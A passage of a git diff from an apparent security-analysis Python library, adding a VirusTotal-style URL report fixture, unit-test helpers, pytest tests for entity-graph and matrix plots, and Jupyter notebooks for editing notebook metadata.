+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CyberCrime"
+      },
+      "Antiy-AVL": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Antiy-AVL"
+      },
+      "Forcepoint ThreatSeeker": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Forcepoint ThreatSeeker"
+      },
+      "FraudSense": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "FraudSense"
+      },
+      "ESTsecurity-Threat Inside": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ESTsecurity-Threat Inside"
+      },
+      "Comodo Site Inspector": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Comodo Site Inspector"
+      },
+      "Malekal": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Malekal"
+      },
+      "ESET": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ESET"
+      },
+      "Sophos": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "Sophos"
+      },
+      "Yandex Safebrowsing": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Yandex Safebrowsing"
+      },
+      "SecureBrain": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "SecureBrain"
+      },
+      "Nucleon": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Nucleon"
+      },
+      "BADWARE.INFO": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "BADWARE.INFO"
+      },
+      "Sucuri SiteCheck": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Sucuri SiteCheck"
+      },
+      "Blueliv": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Blueliv"
+      },
+      "ZCloudsec": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZCloudsec"
+      },
+      "CRDF": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "CRDF"
+      },
+      "ThreatHive": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ThreatHive"
+      },
+      "FraudScore": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "FraudScore"
+      },
+      "Rising": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Rising"
+      },
+      "URLQuery": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "URLQuery"
+      },
+      "StopBadware": {
+        "category": "undetected",
+        "result": "unrated",
+        "method": "blacklist",
+        "engine_name": "StopBadware"
+      },
+      "Fortinet": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Fortinet"
+      },
+      "ZeroCERT": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "ZeroCERT"
+      },
+      "Spam404": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Spam404"
+      },
+      "securolytics": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "securolytics"
+      },
+      "Baidu-International": {
+        "category": "harmless",
+        "result": "clean",
+        "method": "blacklist",
+        "engine_name": "Baidu-International"
+      }
+    },
+    "reputation": 0,
+    "categories": {},
+    "last_modification_date": 1537448291,
+    "last_analysis_stats": {
+      "harmless": 61,
+      "malicious": 0,
+      "suspicious": 0,
+      "undetected": 8,
+      "timeout": 0
+    },
+    "times_submitted": 10,
+    "first_submission_date": 1413100632,
+    "total_votes": {
+      "harmless": 0,
+      "malicious": 0
+    }
+  },
+  "context_attributes": {
+    "url": "http://218.54.47.74/"
+  }
+}
\ No newline at end of file
diff --git a/tests/testdata/win_proc_test.pkl b/tests/testdata/win_proc_test.pkl
new file mode 100644
index 000000000..d5f23d5a7
Binary files /dev/null and b/tests/testdata/win_proc_test.pkl differ
diff --git a/tests/unit_test_lib.py b/tests/unit_test_lib.py
new file mode 100644
index 000000000..6693743f3
--- /dev/null
+++ b/tests/unit_test_lib.py
@@ -0,0 +1,93 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Unit test common utilities."""
+from contextlib import contextmanager
+from pathlib import Path
+import os
+from os import getcwd, chdir
+from typing import Union, Dict, Any, Generator
+
+from filelock import FileLock
+from msticpy.common import pkg_config
+
+__author__ = "Ian Hellen"
+
+
+def get_test_data_path():
+    """Get path to testdata folder."""
+    return Path(__file__).parent.joinpath("testdata")
+
+
+TEST_DATA_PATH = str(get_test_data_path())
+
+
+# pylint: disable=protected-access, broad-except
+@contextmanager
+def custom_mp_config(
+    mp_path: Union[str, Path],
+    path_check: bool = True,
+) -> Generator[Dict[str, Any], None, None]:
+    """
+    Context manager to temporarily set MSTICPYCONFIG path.
+
+    Parameters
+    ----------
+    mp_path : Union[str, Path]
+        Path to msticpy config yaml
+    check_path : bool
+        If False, skip check for existing file
+    Yields
+    ------
+    Dict[str, Any]
+        Custom settings.
+
+    Raises
+    ------
+    FileNotFoundError
+        If mp_path does not exist.
+
+    """
+    current_path = os.environ.get(pkg_config._CONFIG_ENV_VAR)
+    if path_check and not Path(mp_path).is_file():
+        raise FileNotFoundError(f"Setting MSTICPYCONFIG to non-existent file {mp_path}")
+    _lock_file_path = "./.mp_settings.lock"
+    try:
+        # We need to lock the settings since these are global
+        # Otherwise the tests interfere with each other.
+        with FileLock(_lock_file_path):
+            os.environ[pkg_config._CONFIG_ENV_VAR] = str(mp_path)
+            pkg_config.refresh_config()
+            yield pkg_config.settings
+    finally:
+        if not current_path:
+            del os.environ[pkg_config._CONFIG_ENV_VAR]
+        else:
+            os.environ[pkg_config._CONFIG_ENV_VAR] = current_path
+        if Path(_lock_file_path).is_file():
+            try:
+                Path(_lock_file_path).unlink()
+            except Exception:
+                pass
+        pkg_config.refresh_config()
+
+
+@contextmanager
+def change_directory(path):
+    """Change the current working directory temporarily."""
+    path = Path(path).expanduser()
+    prev_path = Path(getcwd())
+    cwd_lock = "./.mp_test_cwd.lock"
+    try:
+        with FileLock(cwd_lock):
+            chdir(str(path))
+            yield
+    finally:
+        chdir(str(prev_path))
+        if Path(cwd_lock).is_file():
+            try:
+                Path(cwd_lock).unlink()
+            except Exception:
+                pass
diff --git a/msticpy/sectools/process_mask.py b/tests/vis/__init__.py
similarity index 100%
rename from msticpy/sectools/process_mask.py
rename to tests/vis/__init__.py
diff --git a/tests/vis/test_entity_graph.py b/tests/vis/test_entity_graph.py
new file mode 100644
index 000000000..da40368b8
--- /dev/null
+++ b/tests/vis/test_entity_graph.py
@@ -0,0 +1,206 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test module for EntityGraph."""
+import pandas as pd
+from bokeh.models.layouts import Column
+from bokeh.plotting.figure import Figure
+from msticpy.datamodel.entities import Alert, Entity, Incident
+from msticpy.nbtools.security_alert import SecurityAlert
+
+# pylint: disable=unused-import
+from msticpy.vis import mp_pandas_plot  # noqa: F401
+from msticpy.vis.entity_graph_tools import EntityGraph
+
+from ..nbtools.test_security_alert import sample_alert
+from ..unit_test_lib import get_test_data_path
+
+__author__ = "Pete Bryan"
+
+inc = {
+    "id": "123",
+    "name": "135a072e-77c3-4293-8c9a-7fdd53b5d620",
+    "etag": '"d4fce673-dd4b-4d22-a39f-bda55d6079f3"',
+    "type": "Microsoft.SecurityInsights/Incidents",
+    "properties.title": "Sample Incident",
+    "properties.description": "This is a sample incident to support unit tests",
+    "properties.severity": "Medium",
+    "properties.status": "Active",
+    "properties.owner.objectId": "0a70480d-b1cd-4466-9b75-3814e34579eb",
+    "properties.owner.email": "user@contoso.com",
+    "properties.owner.assignedTo": "A User",
+    "properties.owner.userPrincipalName": "user@contoso.com",
+    "properties.labels": [{"labelName": "Tests Label", "labelType": "User"}],
+    "properties.firstActivityTimeUtc": "2021-09-22T14:39:24.04Z",
+    "properties.lastActivityTimeUtc": "2021-09-22T14:39:24.04Z",
+    "properties.lastModifiedTimeUtc": "2021-09-22T15:09:34.376619Z",
+    "properties.createdTimeUtc": "2021-09-22T15:09:09.2786667Z",
+    "properties.incidentNumber": 123,
+    "properties.additionalData.alertsCount": 1,
+    "properties.additionalData.bookmarksCount": 0,
+    "properties.additionalData.commentsCount": 0,
+    "properties.additionalData.alertProductNames": ["Azure Sentinel"],
+    "properties.additionalData.tactics": ["PrivilegeEscalation"],
+    "properties.relatedAnalyticRuleIds": ["123"],
+    "properties.incidentUrl": "https://portal.azure.com/#asset/Microsoft_Azure_Security_Insights/Incident/subscriptions/",
+    "Entities": [
+        (
+            "Host",
+            {
+                "dnsDomain": "demo.contoso.com",
+                "hostName": "demo",
+                "omsAgentID": "ce7903cf-2d8f-47e9-a338-2259f02a9779",
+                "osFamily": "Windows",
+                "osVersion": "10",
+                "additionalData": {
+                    "DataSource": "SecurityEvent",
+                    "AzureResourceId": "/subscriptions/ce7903cf-2d8f-47e9-a338-2259f02a9779/resourcegroups/test/providers/microsoft.compute/virtualmachines/demo",
+                    "SubscriptionId": "ce7903cf-2d8f-47e9-a338-2259f02a9779",
+                    "ResourceId": "/subscriptions/ce7903cf-2d8f-47e9-a338-2259f02a9779/resourceGroups/test/providers/Microsoft.Compute/virtualMachines/demo",
+                    "VMUUID": "ce7903cf-2d8f-47e9-a338-2259f02a9779",
+                    "ShouldResolveIp": "False",
+                },
+                "friendlyName": "demo",
+            },
+        ),
+        (
+            "Account",
+            {
+                "accountName": "auser",
+                "displayName": "CONTOSO\\auser",
+                "friendlyName": "CONTOSO\\auser",
+            },
+        ),
+    ],
+    "Alerts": [
+        {
+            "ID": "8b7d06d8-dbae-4b23-87ed-1a27b75437d5",
+            "Name": "User Added to Privileged Group in CONTOSO Domain",
+            "Entities": None,
+        }
+    ],
+    "Type": "incident",
+}
+
+
+incident = Incident(inc)
+alert = Alert(sample_alert)
+sec_alert = SecurityAlert(pd.Series(sample_alert))
+entity = Entity.instantiate_entity(
+    {
+        "$id": "10",
+        "Url": "https://www.contoso.com",
+        "Type": "url",
+        "ClickCount": 0,
+        "EmailCount": 12,
+        "Urn": "urn:UrlEntity:bdae5760b0104bac99e8a3f03f0ede2b",
+        "Source": "OATP",
+        "FirstSeen": "0001-01-01T00:00:00",
+    }
+)
+pd_file = get_test_data_path().joinpath("sent_incidents.pkl")
+sent_incidents = pd.read_pickle(pd_file)
+
+
+def test_entity_graph_incident():
+    """Test graph creation with an incident."""
+    graph = EntityGraph(incident)
+    assert len(graph.alertentity_graph.nodes()) == 4
+    assert "Incident: Sample Incident" in graph.alertentity_graph.nodes()
+
+
+def test_entity_alert_graph():
+    """Test graph creation with an alert."""
+    graph = EntityGraph(alert)
+    assert len(graph.alertentity_graph.nodes()) == 17
+    assert "cmd.exe" in graph.alertentity_graph.nodes()
+
+
+def test_entity_sec_alert_graph():
+    """Test graph creation with a security alert."""
+    graph = EntityGraph(sec_alert)
+    assert len(graph.alertentity_graph.nodes()) == 17
+    assert "cmd.exe" in graph.alertentity_graph.nodes()
+
+
+def test_entity_entity_graph():
+    """Test graph creation with an entity."""
+    graph = EntityGraph(entity)
+    assert len(graph.alertentity_graph.nodes()) == 1
+    assert "https://www.contoso.com" in graph.alertentity_graph.nodes()
+
+
+def test_entity_add():
+    """Test adding an entity to an existing graph."""
+    graph = EntityGraph(incident)
+    graph.add_entity(entity, attached_to="demo")
+    assert len(graph.alertentity_graph.nodes()) == 5
+    assert "https://www.contoso.com" in graph.alertentity_graph.nodes()
+    assert graph.alertentity_graph.has_edge("https://www.contoso.com", "demo")
+
+
+def test_incident_add():
+    """Test adding an incident to an existing graph."""
+    graph = EntityGraph(incident)
+    graph.add_incident(alert)
+    assert len(graph.alertentity_graph.nodes()) == 21
+    assert "cmd.exe" in graph.alertentity_graph.nodes()
+
+
+def test_note_add():
+    """Test adding a note to a graph."""
+    graph = EntityGraph(incident)
+    graph.add_note("Test Note", attached_to="demo")
+    assert len(graph.alertentity_graph.nodes()) == 5
+    assert "Test Note" in graph.alertentity_graph.nodes()
+    assert graph.alertentity_graph.has_edge("Test Note", "demo")
+
+
+def test_link_add_remove():
+    """Test adding and removing a link in an graph."""
+    graph = EntityGraph(incident)
+    graph.add_link("demo", "Alert: User Added to Privileged Group in CONTOSO Domain")
+    assert graph.alertentity_graph.has_edge(
+        "demo", "Alert: User Added to Privileged Group in CONTOSO Domain"
+    )
+    graph.remove_link("demo", "Alert: User Added to Privileged Group in CONTOSO Domain")
+    assert not graph.alertentity_graph.has_edge(
+        "demo", "Alert: User Added to Privileged Group in CONTOSO Domain"
+    )
+
+
+def test_node_remove():
+    """Test removing a node from a graph."""
+    graph = EntityGraph(incident)
+    graph.remove_node("demo")
+    assert not graph.alertentity_graph.has_node("demo")
+
+
+def test_to_df():
+    """Test exporting graph nodes to a dataframe."""
+    graph = EntityGraph(incident)
+    df = graph.to_df()
+    assert len(df.index) == 4
+    assert "demo" in df["Name"].values
+    assert (
+        "Alert: User Added to Privileged Group in CONTOSO Domain" in df["Name"].values
+    )
+
+
+def test_plot():
+    """Test plotting produces Bokeh objects."""
+    graph = EntityGraph(incident)
+    plot = graph.plot(hide=True)
+    tl_plot = graph.plot(hide=True, timeline=True)
+    assert isinstance(plot, Figure)
+    assert isinstance(tl_plot, Column)
+
+
+def test_df_plot():
+    """Test plotting from DataFrame"""
+    plot = sent_incidents.mp_plot.incident_graph()
+    assert isinstance(plot, Figure)
+    plot = sent_incidents.mp_plot.incident_graph(timeline=True)
+    assert isinstance(plot, Column)
diff --git a/tests/vis/test_matrix_plot.py b/tests/vis/test_matrix_plot.py
new file mode 100644
index 000000000..6cadd2ce4
--- /dev/null
+++ b/tests/vis/test_matrix_plot.py
@@ -0,0 +1,131 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test module for matrix_plot."""
+from typing import Any, Dict
+import pandas as pd
+import pytest
+
+from msticpy.vis.matrix_plot import plot_matrix
+
+# pylint: disable=unused-import
+from msticpy.vis import mp_pandas_plot  # noqa: F401
+
+from ..unit_test_lib import get_test_data_path
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="module")
+def network_data():
+    """Get network data."""
+    pd_file = get_test_data_path().joinpath("az_net_flows.csv")
+    return pd.read_csv(
+        pd_file,
+        index_col=0,
+        parse_dates=[
+            "TimeGenerated",
+            "FlowStartTime",
+            "FlowEndTime",
+            "FlowIntervalEndTime",
+        ],
+    )
+
+
+_XY_PARAMS: Dict[str, Any] = {"x": "L7Protocol", "y": "AllExtIPs"}
+_XYCOL_PARAMS: Dict[str, Any] = {"x_col": "L7Protocol", "y_col": "AllExtIPs"}
+
+_TEST_PARAMS = [
+    pytest.param({}, ValueError, id="no_xy_params"),
+    pytest.param(_XY_PARAMS, None, id="basic_xy_params"),
+    pytest.param(_XYCOL_PARAMS, None, id="basic_xycol_params"),
+    pytest.param(
+        {**_XY_PARAMS, "value_col": "TotalAllowedFlows"}, None, id="value_col"
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "value_col": "TotalAllowedFlows", "dist_count": True},
+        None,
+        id="value_col + dist count",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "value_col": "TotalAllowedFlows", "invert": True},
+        None,
+        id="value_col + invert",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "value_col": "TotalAllowedFlows", "log_size": True},
+        None,
+        id="value_col + log_size",
+    ),
+    pytest.param({**_XY_PARAMS, "dist_count": True}, None, id="value_col + dist count"),
+    pytest.param({**_XY_PARAMS, "invert": True}, None, id="value_col + invert"),
+    pytest.param({**_XY_PARAMS, "log_size": True}, None, id="value_col + log_size"),
+    pytest.param({**_XY_PARAMS, "title": "Custom title"}, None, id="title"),
+    pytest.param({**_XY_PARAMS, "intersect": True}, None, id="intersect"),
+    pytest.param(
+        {**_XY_PARAMS, "sort": "asc"},
+        None,
+        id="sort asc",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "sort": "desc"},
+        None,
+        id="sort desc",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "sort": True},
+        None,
+        id="sort True",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "sort": None},
+        None,
+        id="sort None",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "sort": "some string"},
+        None,
+        id="sort Other",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "sort_x": "asc"},
+        None,
+        id="sort_x",
+    ),
+    pytest.param(
+        {**_XY_PARAMS, "sort": "asc", "sort_y": "desc"},
+        None,
+        id="sort_y",
+    ),
+    pytest.param({**_XY_PARAMS, "hide": True}, None, id="hide"),
+]
+
+
+@pytest.mark.parametrize("test_data, exception", _TEST_PARAMS)
+def test_matrix_plot(network_data, test_data, exception):
+    """Function_docstring."""
+    if exception:
+        with pytest.raises(exception):
+            plot_matrix(network_data, **test_data)
+    else:
+        plot_matrix(network_data, **test_data)
+
+
+def test_matrix_plot_no_cols(network_data):
+    """Function_docstring."""
+    data = network_data[["L7Protocol", "AllExtIPs"]]
+    plot_matrix(data, **_XY_PARAMS)
+
+
+@pytest.mark.parametrize("test_data, exception", _TEST_PARAMS)
+def test_matrix_plot_pd(network_data, test_data, exception):
+    """Function_docstring."""
+    if exception:
+        with pytest.raises(exception):
+            network_data.mp_plot.matrix(**test_data)
+    else:
+        network_data.mp_plot.matrix(**test_data)
diff --git a/tools/NotebookMetadata.ipynb b/tools/NotebookMetadata.ipynb
new file mode 100644
index 000000000..9b6253f63
--- /dev/null
+++ b/tools/NotebookMetadata.ipynb
@@ -0,0 +1,367 @@
+{
+ "cells": [
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-09T19:26:34.604840Z",
+     "start_time": "2019-12-09T19:26:33.827779Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "e10637f292d544c68486de6ab7aff72f",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Text(value='', description='Enter file path to notebook', layout=Layout(width='95%'), style=DescriptionStyle(d…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "import nbformat\n",
+    "import ipywidgets as widgets\n",
+    "\n",
+    "WIDGET_DEFAULTS = {\n",
+    "    \"layout\": widgets.Layout(width=\"95%\"),\n",
+    "    \"style\": {\"description_width\": \"initial\"},\n",
+    "}\n",
+    "\n",
+    "WIDGET_LARGE = {\n",
+    "    \"layout\": widgets.Layout(width=\"95%\", height=\"100px\"),\n",
+    "    \"style\": {\"description_width\": \"initial\"},\n",
+    "}\n",
+    "\n",
+    "file_path = widgets.Text(description=\"Enter file path to notebook\",\n",
+    "                        **WIDGET_DEFAULTS)\n",
+    "display(file_path)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-09T19:27:08.863298Z",
+     "start_time": "2019-12-09T19:27:08.693396Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "./Process Masking.ipynb\n"
+     ]
+    }
+   ],
+   "source": [
+    "print(file_path.value)\n",
+    "from pathlib import Path\n",
+    "nb = nbformat.read(file_path.value, as_version=4.0)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-09T19:27:20.312825Z",
+     "start_time": "2019-12-09T19:27:20.302859Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'hide_input': False,\n",
+       " 'kernelspec': {'display_name': 'Python 3',\n",
+       "  'language': 'python',\n",
+       "  'name': 'python3'},\n",
+       " 'language_info': {'codemirror_mode': {'name': 'ipython', 'version': 3},\n",
+       "  'file_extension': '.py',\n",
+       "  'mimetype': 'text/x-python',\n",
+       "  'name': 'python',\n",
+       "  'nbconvert_exporter': 'python',\n",
+       "  'pygments_lexer': 'ipython3',\n",
+       "  'version': '3.7.3'},\n",
+       " 'toc': {'base_numbering': 1,\n",
+       "  'nav_menu': {},\n",
+       "  'number_sections': False,\n",
+       "  'sideBar': True,\n",
+       "  'skip_h1_title': False,\n",
+       "  'title_cell': 'Table of Contents',\n",
+       "  'title_sidebar': 'Contents',\n",
+       "  'toc_cell': False,\n",
+       "  'toc_position': {},\n",
+       "  'toc_section_display': True,\n",
+       "  'toc_window_display': False},\n",
+       " 'varInspector': {'cols': {'lenName': 16, 'lenType': 16, 'lenVar': 40},\n",
+       "  'kernels_config': {'python': {'delete_cmd_postfix': '',\n",
+       "    'delete_cmd_prefix': 'del ',\n",
+       "    'library': 'var_list.py',\n",
+       "    'varRefreshCmd': 'print(var_dic_list())'},\n",
+       "   'r': {'delete_cmd_postfix': ') ',\n",
+       "    'delete_cmd_prefix': 'rm(',\n",
+       "    'library': 'var_list.r',\n",
+       "    'varRefreshCmd': 'cat(var_dic_list()) '}},\n",
+       "  'types_to_exclude': ['module',\n",
+       "   'function',\n",
+       "   'builtin_function_or_method',\n",
+       "   'instance',\n",
+       "   '_Feature'],\n",
+       "  'window_display': False}}"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "nb[\"metadata\"]\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-09T19:27:27.235900Z",
+     "start_time": "2019-12-09T19:27:27.229906Z"
+    }
+   },
+   "outputs": [],
+   "source": [
+    "DEF_KERNELSPEC = {\n",
+    "    \"name\": \"python36\",\n",
+    "    \"display_name\": \"Python 3.6\",\n",
+    "    \"language\": \"python\"\n",
+    "}\n",
+    "\n",
+    "DEF_DATASOURCES = [\n",
+    "    \"SecurityAlert\",\n",
+    "    \"SecurityEvent\",\n",
+    "    \"HuntingBookmark\",\n",
+    "    \"Syslog\",\n",
+    "    \"AAD SigninLogs\",\n",
+    "    \"AzureActivity\",\n",
+    "    \"OfficeActivity\",\n",
+    "    \"ThreatIndicator\",\n",
+    "    \"VirusTotal (API key required)\",\n",
+    "    \"AlienVault OTX (API key required)\",\n",
+    "    \"IBM XForce (API key required)\",\n",
+    "    \"Open Page Rank (API key required)\"\n",
+    "]\n",
+    "\n",
+    "DEF_PLATFORMS = [\n",
+    "    \"Azure Notebooks Free Compute\",\n",
+    "    \"Azure Notebooks DSVM\",\n",
+    "    \"OS Independent\"\n",
+    "]\n",
+    "\n",
+    "DEF_PYVERSION = \"Python 3.6 (including Python 3.6 - AzureML)\"\n",
+    "\n",
+    "AS_META_KEY = \"azure.azuresentinel\"\n",
+    "\n",
+    "as_metadata = nb[\"metadata\"].get(AS_META_KEY, {})\n",
+    "ks_metadata = nb[\"metadata\"].get(\"kernelspec\", {})"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-09T19:27:38.776161Z",
+     "start_time": "2019-12-09T19:27:38.731212Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "1a6e6b084971420c86456a6eaf66378f",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', layout=Layout(width='95%'), placeholder='notebook title', style=DescriptionStyle…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "kernel_version = widgets.Text(\n",
+    "                     value=ks_metadata.get(\"name\", DEF_KERNELSPEC[\"name\"]),\n",
+    "                     **WIDGET_DEFAULTS)\n",
+    "kernel_version_name = widgets.Text(\n",
+    "                     value=ks_metadata.get(\"display_name\", DEF_KERNELSPEC[\"display_name\"]),\n",
+    "                     **WIDGET_DEFAULTS)\n",
+    "kernel_lang = widgets.Text(\n",
+    "                     value=ks_metadata.get(\"language\", DEF_KERNELSPEC[\"language\"]),\n",
+    "                     **WIDGET_DEFAULTS)\n",
+    "\n",
+    "title = widgets.Text(placeholder=\"notebook title\",\n",
+    "                     value=as_metadata.get(\"title\"),\n",
+    "                     **WIDGET_DEFAULTS)\n",
+    "description = widgets.Textarea(placeholder=\"notebook description\",\n",
+    "                               value=as_metadata.get(\"description\"),\n",
+    "                               **WIDGET_LARGE)\n",
+    "nbversion = widgets.Text(\n",
+    "                         value=as_metadata.get(\"nbversion\", \"1.0\"),\n",
+    "                         **WIDGET_DEFAULTS)\n",
+    "pyversion = widgets.Text(\n",
+    "                         value=as_metadata.get(\"pyversion\", DEF_PYVERSION),\n",
+    "                         **WIDGET_DEFAULTS)\n",
+    "platforms = widgets.Textarea(\n",
+    "                             value=\"\\n\".join(as_metadata.get(\"platforms\", DEF_PLATFORMS)),\n",
+    "                             **WIDGET_LARGE)\n",
+    "datasources = widgets.Textarea(\n",
+    "                               value=\"\\n\".join(as_metadata.get(\"datasources\", DEF_DATASOURCES)),\n",
+    "                               **WIDGET_LARGE)\n",
+    "display(widgets.VBox([\n",
+    "    title,\n",
+    "    description,\n",
+    "    nbversion,\n",
+    "    pyversion,\n",
+    "    platforms,\n",
+    "    datasources,\n",
+    "    kernel_version,\n",
+    "    kernel_version_name,\n",
+    "    kernel_lang,\n",
+    "    ]))"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-09T19:27:53.436250Z",
+     "start_time": "2019-12-09T19:27:53.375284Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ec050e70f5384d79a657276d85583cf4",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(VBox(children=(Label(value='Title'), Label(value='Description', layout=Layout(height='100px', w…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "wgt_vbox = widgets.VBox(\n",
+    "    [\n",
+    "        title,\n",
+    "        description,\n",
+    "        nbversion,\n",
+    "        pyversion,\n",
+    "        platforms,\n",
+    "        datasources,\n",
+    "        kernel_version,\n",
+    "        kernel_version_name,\n",
+    "        kernel_lang,\n",
+    "    ],\n",
+    "    layout=widgets.Layout(width=\"75%\")\n",
+    ")\n",
+    "lbl_vbox = widgets.VBox(\n",
+    "    [\n",
+    "        widgets.Label(\"Title\"),\n",
+    "        widgets.Label(\"Description\", **WIDGET_LARGE),\n",
+    "        widgets.Label(\"Notebook version\"),\n",
+    "        widgets.Label(\"Supported Python versions\"),\n",
+    "        widgets.Label(\"Supported Platforms\", **WIDGET_LARGE),\n",
+    "        widgets.Label(\"Data Sources\", **WIDGET_LARGE),\n",
+    "        widgets.Label(\"Kernel version\",),\n",
+    "        widgets.Label(\"Kernel name\"),\n",
+    "        widgets.Label(\"Kernel version\"),\n",
+    "    ], \n",
+    "    layout=widgets.Layout(width=\"25%\"))\n",
+    "display(widgets.HBox([lbl_vbox, wgt_vbox]))"
+   ]
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.4"
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": false
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}
diff --git a/tools/QueryProviderDocumenter.ipynb b/tools/QueryProviderDocumenter.ipynb
new file mode 100644
index 000000000..7130f8bed
--- /dev/null
+++ b/tools/QueryProviderDocumenter.ipynb
@@ -0,0 +1,463 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# TODO\n",
+    "See CSV Tables\n",
+    "https://docutils.sourceforge.io/docs/ref/rst/directives.html#csv-table\n"
+   ]
+  },
+  {
+   "cell_type": "code",
